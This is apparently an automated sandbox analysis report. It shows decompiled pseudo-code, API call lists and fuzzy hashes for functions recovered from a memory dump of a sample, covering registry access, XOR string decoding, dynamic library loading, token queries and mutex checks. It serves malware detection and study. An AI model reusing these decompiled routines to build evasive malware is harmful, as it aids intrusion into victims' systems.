			E00E59B29(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				int* _v40;
				int** _v44;
				void _v108;
				int* _t90;
				int _t91;
				char* _t92;
				long _t96;
				int* _t97;
				intOrPtr _t98;
				int* _t101;
				intOrPtr _t110;
				int* _t111;
				int* _t112;
				intOrPtr _t122;
				char* _t125;
				intOrPtr _t126;
				intOrPtr _t128;
				int* _t129;
				intOrPtr _t131;
				int* _t133;
				intOrPtr _t134;
				int* _t135;
				intOrPtr _t136;
				char* _t139;
				int _t143;
				int _t147;
				intOrPtr _t148;
				int* _t149;
				int* _t154;
				int** _t155;
				int* _t161;
				int* _t163;
				intOrPtr _t164;
				intOrPtr _t171;
				int _t176;
				char* _t177;
				char* _t178;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t183;

				_t176 = 0;
				_v24 = __edx;
				_t177 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t155 = E00E585EA(0x110);
				_v44 = _t155;
				if(_t155 != 0) {
					_t158 = _a4;
					_t155[0x42] = _a4;
					E00E5B5DC(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
					_t161 = _v108;
					__eflags = _t161 - 0x61 - 0x19;
					_t90 = _t161;
					if(_t161 - 0x61 <= 0x19) {
						_t90 = _t90 - 0x20;
						__eflags = _t90;
					}
					_v108 = _t90;
					_t91 = E00E595AD(0x4d2);
					_t13 =  &_v24; // 0xe55c2d
					_t163 =  *_t13;
					_v16 = _t91;
					__eflags = _t163;
					if(_t163 == 0) {
						L16:
						_t164 =  *0xe6e688; // 0xe80000
						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
							_push(_t176);
							_push( &_v108);
							_push("\\");
							_t92 = E00E59278(_t91);
							_t181 = _t181 + 0x10;
							L20:
							_t177 = _t92;
							_v20 = _t177;
							goto L21;
						}
						_t51 =  &_v24; // 0xe55c2d
						_v24 = _t176;
						_v8 = 0x80000003;
						_t122 =  *0xe6e68c; // 0x510f890
						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))), _t51);
						__eflags = _v24 - _t177;
						if(_v24 == _t177) {
							goto L21;
						}
						_push(_t176);
						_push( &_v108);
						_t125 = "\\";
						_push(_t125);
						_push(_v16);
						_push(_t125);
						_t59 =  &_v24; // 0xe55c2d
						_t92 = E00E59278( *_t59);
						_t181 = _t181 + 0x18;
						goto L20;
					} else {
						_t126 =  *0xe6e688; // 0xe80000
						_t128 =  *0xe6e68c; // 0x510f890
						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
						__eflags = _t129;
						if(_t129 != 0) {
							_t91 = _v16;
							goto L16;
						}
						_v12 = _t176;
						_t131 =  *0xe6e68c; // 0x510f890
						_t19 =  &_v24; // 0xe55c2d
						_v8 = 0x80000003;
						 *((intOrPtr*)(_t131 + 0x20))( *_t19,  &_v12);
						__eflags = _v12 - _t177;
						if(_v12 == _t177) {
							L21:
							E00E585A8( &_v16);
							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a8;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 1;
								}
								_push(_v28);
								L30:
								_t98 =  *0xe6e68c; // 0x510f890
								 *((intOrPtr*)(_t98 + 0x1c))();
								_t155[0x43] = _v8;
								_t101 = E00E5C384(_t177);
								 *_t155 = _t101;
								__eflags = _t101;
								if(_t101 == 0) {
									L32:
									E00E58600( &_v20, 0xffffffff);
									return _t155;
								} else {
									goto L31;
								}
								do {
									L31:
									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
									_t176 = _t176 + 1;
									__eflags = _t176 -  *_t155;
								} while (_t176 <  *_t155);
								goto L32;
							}
							_v16 = _t176;
							_t110 =  *0xe6e68c; // 0x510f890
							_t111 =  *((intOrPtr*)(_t110 + 0x28))(_v8, _t177,  &_v16);
							__eflags = _t111;
							if(_t111 == 0) {
								_t112 = _a8;
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 = _t176;
								}
								_push(_v16);
								goto L30;
							}
							L23:
							E00E58600( &_v44, 0x110);
							memset( &_v108, _t176, 0x40);
							E00E58600( &_v20, 0xffffffff);
							goto L1;
						}
						_push(_t176);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t133 = E00E59278(_v12);
						_t181 = _t181 + 0x10;
						_v40 = _t133;
						__eflags = _t133;
						if(_t133 == 0) {
							goto L23;
						}
						_t134 =  *0xe6e68c; // 0x510f890
						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
						__eflags = _t135;
						if(_t135 == 0) {
							_t136 =  *0xe6e68c; // 0x510f890
							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
						} else {
							_t143 = E00E595C7( &_v36, 0x34);
							_v24 = _t143;
							_t179 = E00E592CB(_v32);
							_t31 =  &_v24; // 0xe55c2d
							_v32 = _t179;
							E00E585BB(_t31);
							_t183 = _t181 + 0x18;
							_t147 = E00E5923C(_v12);
							_v24 = _t147;
							_t148 =  *0xe6e68c; // 0x510f890
							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
							__eflags = _t149;
							if(_t149 == 0) {
								_t154 = _a12;
								__eflags = _t154;
								if(_t154 != 0) {
									 *_t154 = 1;
								}
							}
							E00E58600( &_v32, 0xfffffffe);
							E00E58600( &_v24, 0xfffffffe);
							_t181 = _t183 + 0x10;
							_t178 = "\\";
						}
						_t139 = E00E59278(_v12);
						_t171 =  *0xe6e684; // 0x510f6c8
						_t181 = _t181 + 0x18;
						_t177 = _t139;
						_v20 = _t177;
						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
						E00E58600( &_v40, 0xffffffff);
						goto L21;
					}
				}
				L1:
				return 0;
			}

0x00e59b32
0x00e59b34
0x00e59b37
0x00e59b39
0x00e59b41
0x00e59b44
0x00e59b4b
0x00e59b53
0x00e59b55
0x00e59b5b
0x00e59b64
0x00e59b6c
0x00e59b72
0x00e59b79
0x00e59b7f
0x00e59b81
0x00e59b84
0x00e59b86
0x00e59b86
0x00e59b86
0x00e59b8e
0x00e59b91
0x00e59b96
0x00e59b96
0x00e59b99
0x00e59b9c
0x00e59b9e
0x00e59cd4
0x00e59cd4
0x00e59cda
0x00e59ce1
0x00e59d22
0x00e59d26
0x00e59d27
0x00e59d2d
0x00e59d32
0x00e59d35
0x00e59d35
0x00e59d37
0x00000000
0x00e59d37
0x00e59ce3
0x00e59ce6
0x00e59cf0
0x00e59cf9
0x00e59cfe
0x00e59d01
0x00e59d04
0x00000000
0x00000000
0x00e59d06
0x00e59d0a
0x00e59d0b
0x00e59d10
0x00e59d11
0x00e59d14
0x00e59d15
0x00e59d18
0x00e59d1d
0x00000000
0x00e59ba4
0x00e59ba4
0x00e59bb1
0x00e59bb7
0x00e59bba
0x00e59bbc
0x00e59cd1
0x00000000
0x00e59cd1
0x00e59bc5
0x00e59bc9
0x00e59bce
0x00e59bd1
0x00e59bd8
0x00e59bdb
0x00e59bde
0x00e59d3a
0x00e59d3d
0x00e59d55
0x00e59d58
0x00e59d5a
0x00e59dae
0x00e59db1
0x00e59db3
0x00e59db5
0x00e59db5
0x00e59dbb
0x00e59dbe
0x00e59dbe
0x00e59dc3
0x00e59dca
0x00e59dd0
0x00e59dd5
0x00e59dd8
0x00e59dda
0x00e59df1
0x00e59df7
0x00000000
0x00000000
0x00000000
0x00000000
0x00e59ddc
0x00e59ddc
0x00e59de8
0x00e59dec
0x00e59ded
0x00e59ded
0x00000000
0x00e59ddc
0x00e59d5f
0x00e59d63
0x00e59d6c
0x00e59d6f
0x00e59d71
0x00e59da0
0x00e59da3
0x00e59da5
0x00e59da7
0x00e59da7
0x00e59da9
0x00000000
0x00e59da9
0x00e59d73
0x00e59d7c
0x00e59d88
0x00e59d93
0x00000000
0x00e59d98
0x00e59be4
0x00e59be5
0x00e59be8
0x00e59bed
0x00e59bf1
0x00e59bf6
0x00e59bf9
0x00e59bfc
0x00e59bfe
0x00000000
0x00000000
0x00e59c0f
0x00e59c17
0x00e59c1a
0x00e59c1c
0x00e59c91
0x00e59c99
0x00e59c1e
0x00e59c20
0x00e59c2f
0x00e59c37
0x00e59c39
0x00e59c3d
0x00e59c40
0x00e59c48
0x00e59c4b
0x00e59c55
0x00e59c58
0x00e59c5d
0x00e59c60
0x00e59c62
0x00e59c64
0x00e59c67
0x00e59c69
0x00e59c6b
0x00e59c6b
0x00e59c69
0x00e59c77
0x00e59c82
0x00e59c87
0x00e59c8a
0x00e59c8a
0x00e59ca9
0x00e59cae
0x00e59cb4
0x00e59cb7
0x00e59cb9
0x00e59cbf
0x00e59cc8
0x00000000
0x00e59cce
0x00e59b9e
0x00e59b5d
0x00000000

Strings

-\, xrefs: 00E59B96, 00E59CE3, 00E59D15, 00E59BCE, 00E59C39, 00E59BB6, 00E59C3C, 00E59CE9

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: AllocateHeap
String ID: -\
API String ID: 1279760036-177948265
Opcode ID: ae9eb4cfbbe876d7f7a9cac02c2acea8e2abedda420cec33fd520f26ab2c01c6
Instruction ID: 32e7024b91fb653b3f58ed148905c1ffb8a1e407d41e0dff4c0011b3c2915d29
Opcode Fuzzy Hash: ae9eb4cfbbe876d7f7a9cac02c2acea8e2abedda420cec33fd520f26ab2c01c6
Instruction Fuzzy Hash: 1F9159B5900209EFDF10DFA5DC459EEBBB8EF04311F105969F915BB262D7709A08CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E5E1C7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00E5E1C7(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E00E595AD(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E00E5E17C(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				_t4 =  &_v8; // 0xe5604a
				E00E585A8(_t4);
				return _t25;
			}

0x00e5e1ca
0x00e5e1cd
0x00e5e1d3
0x00e5e1d5
0x00e5e1da
0x00e5e1dc
0x00e5e1e6
0x00e5e1e7
0x00e5e1f6
0x00e5e1e9
0x00e5e1e9
0x00e5e1e9
0x00e5e1fa
0x00e5e201
0x00e5e207
0x00e5e207
0x00e5e209
0x00e5e20c
0x00e5e217

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,00E6BA20), ref: 00E5E1E9
LoadLibraryA.KERNELBASE(00000000,00000000,00000001,?,00E6BA20), ref: 00E5E1F6

Strings

J`, xrefs: 00E5E209

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: HandleLibraryLoadModule
String ID: J`
API String ID: 4133054770-2608114221
Opcode ID: c7b024ec9d29f04477f3b184faeb47686933a0c84e3f0b9139cf9f115444862d
Instruction ID: c4296dd63bdf3abe848b0e111fcb6b3fce87223b347e41fffabb12856fec40f7
Opcode Fuzzy Hash: c7b024ec9d29f04477f3b184faeb47686933a0c84e3f0b9139cf9f115444862d
Instruction Fuzzy Hash: 23F0AE317011149BD7086B6DED8589FB7DC9F947967105429F806F7351DDB09E4887F0

Uniqueness

Uniqueness Score: -1.00%

Function 00E5B97E, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00E5B97E(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E00E585EA(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E00E58600( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x00e5b981
0x00e5b982
0x00e5b989
0x00e5b991
0x00e5b995
0x00e5b99e
0x00e5b9e4
0x00e5b9e4
0x00e5b9ab
0x00e5b9b3
0x00e5b9b5
0x00e5b9bb
0x00e5b9d4
0x00000000
0x00e5b9d6
0x00e5b9db
0x00000000
0x00e5b9e1
0x00e5b9bd
0x00e5b9bd
0x00e5b9bd
0x00e5b9bd
0x00e5b9bb
0x00e5b9ea

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,73BCF500,00000000,10000000,00000000,00000000,?,00E5BA1D,?,00000000,?,00E5D0B3), ref: 00E5B999
GetLastError.KERNEL32(?,00E5BA1D,?,00000000,?,00E5D0B3), ref: 00E5B9A0

Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,00E5BA1D,?,00000000,?,00E5D0B3), ref: 00E5B9CF

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: InformationToken$AllocateErrorHeapLast
String ID:
API String ID: 2499131667-0
Opcode ID: 100a845c7dae8c3c4046c4bbcbdbfc83319b8bd0ef4d48fccb9cbb25800a79e2
Instruction ID: 6c780fe1d2cfac424566bbc85ca30abf7be67c071883c2dfd79a6ee63ee9c8fc
Opcode Fuzzy Hash: 100a845c7dae8c3c4046c4bbcbdbfc83319b8bd0ef4d48fccb9cbb25800a79e2
Instruction Fuzzy Hash: 2F01A772600114BF8B205BA5DC49D9F7FACDF857A67105955FA05F6210E770DD0887A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E558F4, Relevance: 4.5, APIs: 3, Instructions: 44
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E558F4(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				signed int _t21;
				signed int _t22;

				_t13 = __edx;
				if(__ecx != 0) {
					_t22 = 0;
					_t19 = CreateMutexA(0, 1, __ecx);
					if(_t19 != 0) {
						if(GetLastError() != 0xb7 || E00E5A4A5(_t19, _t13) != 0xffffffff) {
							_t22 = 1;
							 *_a4 = _t19;
						} else {
							_t10 =  *0xe6e684; // 0x510f6c8
							 *((intOrPtr*)(_t10 + 0x30))(_t19);
						}
					} else {
						GetLastError();
						_t22 = 0xffffffff;
					}
				} else {
					_t22 = _t21 | 0xffffffff;
				}
				return _t22;
			}

0x00e558f8
0x00e558fd
0x00e55909
0x00e55916
0x00e5591a
0x00e55932
0x00e55952
0x00e55953
0x00e55942
0x00e55942
0x00e55948
0x00e55948
0x00e5591c
0x00e5591c
0x00e55922
0x00e55922
0x00e558ff
0x00e558ff
0x00e558ff
0x00e5595b

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,00E559B5,00E55DBC,Global,00E6BA10,?,00000000,?,00000002), ref: 00E55910
GetLastError.KERNEL32(?,?,00E559B5,00E55DBC,Global,00E6BA10,?,00000000,?,00000002), ref: 00E5591C

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: CreateErrorLastMutex
String ID:
API String ID: 1925916568-0
Opcode ID: c23569b18c089e7bd7e78cd9ce01a2b4950b5f139f9468dfdf0ca0d904ea331e
Instruction ID: c773d07f2f56b812440dd089e60bac3b0cc98e2473873043eadc3e4029b90dac
Opcode Fuzzy Hash: c23569b18c089e7bd7e78cd9ce01a2b4950b5f139f9468dfdf0ca0d904ea331e
Instruction Fuzzy Hash: 16F0F432200510CBDB100B5AE858A7B76A8EFD6376B111B21FD79E72D0CBB48C0D42A2

Uniqueness

Uniqueness Score: -1.00%

Function 00E5595C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00E5595C(void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				char _v12;
				char _v52;
				intOrPtr _t16;
				void* _t19;
				intOrPtr _t27;
				void* _t42;

				_t42 = __edx;
				_v8 = 0;
				E00E5A853( &_v52, __ecx, __eflags);
				_t16 =  *0xe6e688; // 0xe80000
				if( *((intOrPtr*)(_t16 + 0x644)) > 0) {
					L1:
					_t27 =  *0xe6e684; // 0x510f6c8
					 *((intOrPtr*)(_t27 + 0xb4))(0x32);
					goto L1;
				}
				_push(0);
				_push( &_v52);
				_push("\\");
				_v12 = E00E59278("Global");
				_t19 = E00E558F4(_t18, _t42,  &_v8); // executed
				__eflags = _t19 - 1;
				if(_t19 == 1) {
					FindCloseChangeNotification(_v8);
					_v8 = 0;
					E00E558F4( &_v52, _t42,  &_v8); // executed
				}
				E00E58600( &_v12, 0xffffffff);
				return _v8;
			}

0x00e55964
0x00e5596a
0x00e55970
0x00e55975
0x00e55980
0x00e55982
0x00e55982
0x00e55989
0x00000000
0x00e55989
0x00e55991
0x00e55995
0x00e55996
0x00e559a8
0x00e559b0
0x00e559b8
0x00e559bb
0x00e559c5
0x00e559cb
0x00e559d4
0x00e559d9
0x00e559e0
0x00e559ed

APIs

FindCloseChangeNotification.KERNELBASE(00E55DBC,?,?,?,?,00000002), ref: 00E559C5

Strings

Global, xrefs: 00E5599B

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: ChangeCloseFindNotification
String ID: Global
API String ID: 2591292051-4020866741
Opcode ID: 12481b30765af1801dc55efe0164fc4135110293b20458706f166713140ec105
Instruction ID: 636375fa918944c71d37de5cb148279a0b40757e33b767c06ce6563802dfa792
Opcode Fuzzy Hash: 12481b30765af1801dc55efe0164fc4135110293b20458706f166713140ec105
Instruction Fuzzy Hash: B8115E76904108EFCB04EB99E945CDEB7F8EB94311B201566F815F7291DA709A09C651

Uniqueness

Uniqueness Score: -1.00%

Function 00E5A68F, Relevance: 3.1, APIs: 2, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E00E5A68F(void* __ecx, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t58;
				char _t60;

				_push(__ecx);
				_push(__ecx);
				_t50 = _a4;
				_t60 = 0;
				_v12 = 0;
				if(_a4 != 0) {
					_t47 = E00E5A621(_t50);
					if(_t47 == 0) {
						L11:
						_t26 = 0;
						L12:
						L13:
						return _t26;
					}
					_t27 =  *0xe6e684; // 0x510f6c8
					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
					if(_t58 == 0) {
						L9:
						_t29 =  *0xe6e684; // 0x510f6c8
						 *((intOrPtr*)(_t29 + 0x30))(_t47);
						if(_t60 != 0) {
							E00E58600( &_v12, 0);
						}
						goto L11;
					}
					_t4 = _t58 + 1; // 0x1
					_t60 = E00E585EA(_t4);
					_v12 = _t60;
					if(_t60 == 0) {
						goto L9;
					}
					_a4 = _a4 & 0;
					_push(0);
					_v8 = 0;
					_push( &_a4);
					_push(_t58);
					_push(_t60);
					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
						if(_a4 == 0) {
							if(_v8 != _t58) {
								goto L9;
							}
							_t39 = _a8;
							 *((char*)(_t58 + _t60)) = 0;
							if(_t39 != 0) {
								 *_t39 = _t58;
							}
							FindCloseChangeNotification(_t47);
							_t26 = _t60;
							goto L12;
						}
						_t55 = _v8 + _a4;
						_a4 = _a4 & 0x00000000;
						_push(0);
						_push( &_a4);
						_v8 = _t55;
						_push(_t58 - _t55);
						_push(_t55 + _t60);
					}
					goto L9;
				}
				_t26 = 0;
				goto L13;
			}

0x00e5a692
0x00e5a693
0x00e5a694
0x00e5a698
0x00e5a69a
0x00e5a69f
0x00e5a6af
0x00e5a6b3
0x00e5a73d
0x00e5a73d
0x00e5a73f
0x00e5a741
0x00e5a743
0x00e5a743
0x00e5a6b9
0x00e5a6c7
0x00e5a6cb
0x00e5a723
0x00e5a723
0x00e5a729
0x00e5a72e
0x00e5a736
0x00e5a73c
0x00000000
0x00e5a72e
0x00e5a6cd
0x00e5a6d6
0x00e5a6d8
0x00e5a6de
0x00000000
0x00000000
0x00e5a6e2
0x00e5a6e5
0x00e5a6e6
0x00e5a6ec
0x00e5a6ed
0x00e5a6ee
0x00e5a713
0x00e5a6f5
0x00e5a747
0x00000000
0x00000000
0x00e5a749
0x00e5a74c
0x00e5a752
0x00e5a754
0x00e5a754
0x00e5a75c
0x00e5a75f
0x00000000
0x00e5a75f
0x00e5a6fd
0x00e5a700
0x00e5a704
0x00e5a706
0x00e5a709
0x00e5a70e
0x00e5a712
0x00e5a712
0x00000000
0x00e5a713
0x00e5a6a1
0x00000000

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00E5FA61,00000000,00E5F8C0,00E7EFE0,00E6B988,00000000,00E6B988,00000000,00000000,00000615), ref: 00E5A719
FindCloseChangeNotification.KERNELBASE(00000000,?,00E5FA61,00000000,00E5F8C0,00E7EFE0,00E6B988,00000000,00E6B988,00000000,00000000,00000615,0000034A,00000000,0510FB08,00000400), ref: 00E5A75C

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: ChangeCloseFileFindNotificationRead
String ID:
API String ID: 1200561807-0
Opcode ID: 8a87b561defd2131de8961babf5473d1792a03d643be7297579852ab61ab0a79
Instruction ID: 6def4dcc92944eb161f3228ad3b8d025c01a3a76a090216767f8914f56cf0c58
Opcode Fuzzy Hash: 8a87b561defd2131de8961babf5473d1792a03d643be7297579852ab61ab0a79
Instruction Fuzzy Hash: 02217C75600205AFDB10CF64C884BAA77FCEF08355F28596AFD05EB241E7B0D94887A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E55CD4, Relevance: 3.0, APIs: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E55CD4() {
				void _v44;
				signed int _t8;
				intOrPtr _t14;
				intOrPtr _t15;
				void* _t22;
				void* _t33;

				_t8 =  *0xe6e688; // 0xe80000
				E00E624A6(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E00E585D5();
				E00E58F5E();
				 *0xe6e780 = 0;
				 *0xe6e784 = 0;
				 *0xe6e77c = 0;
				E00E55E9E(); // executed
				E00E5CF8F(_t22);
				_t14 =  *0xe6e688; // 0xe80000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0xe6e688; // 0xe80000
				E00E5A853( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7,  *((intOrPtr*)(_t15 + 0xac)) + 7);
				E00E5B31D( &_v44);
				memset( &_v44, 0, 0x27);
				E00E55C0E( &_v44, _t33);
				ExitProcess(0);
			}

0x00e55cd7
0x00e55ce6
0x00e55ceb
0x00e55cf0
0x00e55cf7
0x00e55cfd
0x00e55d03
0x00e55d09
0x00e55d0e
0x00e55d13
0x00e55d1b
0x00e55d25
0x00e55d33
0x00e55d3b
0x00e55d47
0x00e55d4f
0x00e55d5a

APIs

Part of subcall function 00E585D5: HeapCreate.KERNELBASE(00000000,00080000,00000000,00E55F84), ref: 00E585DE

Part of subcall function 00E5CF8F: GetCurrentProcess.KERNEL32(?,?,00E80000,?,00E5353A), ref: 00E5CF9B
Part of subcall function 00E5CF8F: GetModuleFileNameW.KERNEL32(00000000,00E81644,00000105,?,?,00E80000,?,00E5353A), ref: 00E5CFBC
Part of subcall function 00E5CF8F: memset.MSVCRT ref: 00E5CFED
Part of subcall function 00E5CF8F: GetVersionExA.KERNEL32(00E80000,00E80000,?,00E5353A), ref: 00E5CFF8
Part of subcall function 00E5CF8F: GetCurrentProcessId.KERNEL32(?,00E5353A), ref: 00E5CFFE

Part of subcall function 00E5B31D: FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00E53C8B,?,?,?,?,?,?,?,?,00E53D70,00000000), ref: 00E5B350

memset.MSVCRT ref: 00E55D47
ExitProcess.KERNEL32(00000000,?,?,?), ref: 00E55D5A

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: Process$Currentmemset$ChangeCloseCreateExitFileFindHeapModuleNameNotificationVersion
String ID:
API String ID: 2253208953-0
Opcode ID: 2c8111a6ea0e59319d66e38611a5562695ff825faef628297cb76fd03b03529d
Instruction ID: cd59e9ec74d897875f0e05e60d4e1501a5094cae1901655083ec22df4fe2fa18
Opcode Fuzzy Hash: 2c8111a6ea0e59319d66e38611a5562695ff825faef628297cb76fd03b03529d
Instruction Fuzzy Hash: 90014B755012149FD600FBA9E85AE8F3BE8EF18361F451465F904B7262DBB065098BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00E5A642, Relevance: 1.5, APIs: 1, Instructions: 37
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00E5A642(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}

0x00e5a642
0x00e5a645
0x00e5a646
0x00e5a649
0x00e5a64b
0x00e5a64e
0x00e5a653
0x00e5a684
0x00e5a686
0x00e5a655
0x00e5a655
0x00e5a655
0x00e5a677
0x00000000
0x00000000
0x00e5a679
0x00e5a67c
0x00e5a682
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00e5a682
0x00e5a68b
0x00e5a68b
0x00e5a687
0x00e5a68a

APIs

WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00E58F37,?), ref: 00E5A66F

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 984df2ead62b075ac816e62ee5ff31a15eb23a4d1c2526683fe67d27f65da3a9
Instruction ID: d6ecf4985e48f3eb7701374b7dd1f506d8b3e3a6446a60e7daa4efa35c271161
Opcode Fuzzy Hash: 984df2ead62b075ac816e62ee5ff31a15eb23a4d1c2526683fe67d27f65da3a9
Instruction Fuzzy Hash: 8DF0F972A10119BFDB10DF98C988AEAB7ECEB04745F194569A909E7140D6B0AE4487A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E58600, Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E58600(char _a4, intOrPtr _a8) {
				char _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E00E5C39D(_t9);
						}
					} else {
						_t4 = E00E5C384(_t9);
					}
					E00E58735(_t9, 0, _t4);
					_t3 = RtlFreeHeap( *0xe6e768, 0, _t9); // executed
				}
				return _t3;
			}

0x00e58603
0x00e58608
0x00e5864e
0x00e5864e
0x00e5860b
0x00e5860f
0x00e58611
0x00e58614
0x00e5861a
0x00e58628
0x00e5862c
0x00e5862c
0x00e5861c
0x00e5861d
0x00e58622
0x00e58635
0x00e58646
0x00e58646
0x00000000

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00E56020), ref: 00E58646

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b98f5dbfb87f784ecb6bb2a06bafbae65ba661fe07296e1f39791b71436e54f6
Instruction ID: 4aeb033475177d6733ec7199c048649d0ab8753658979056536ac841387dfeeb
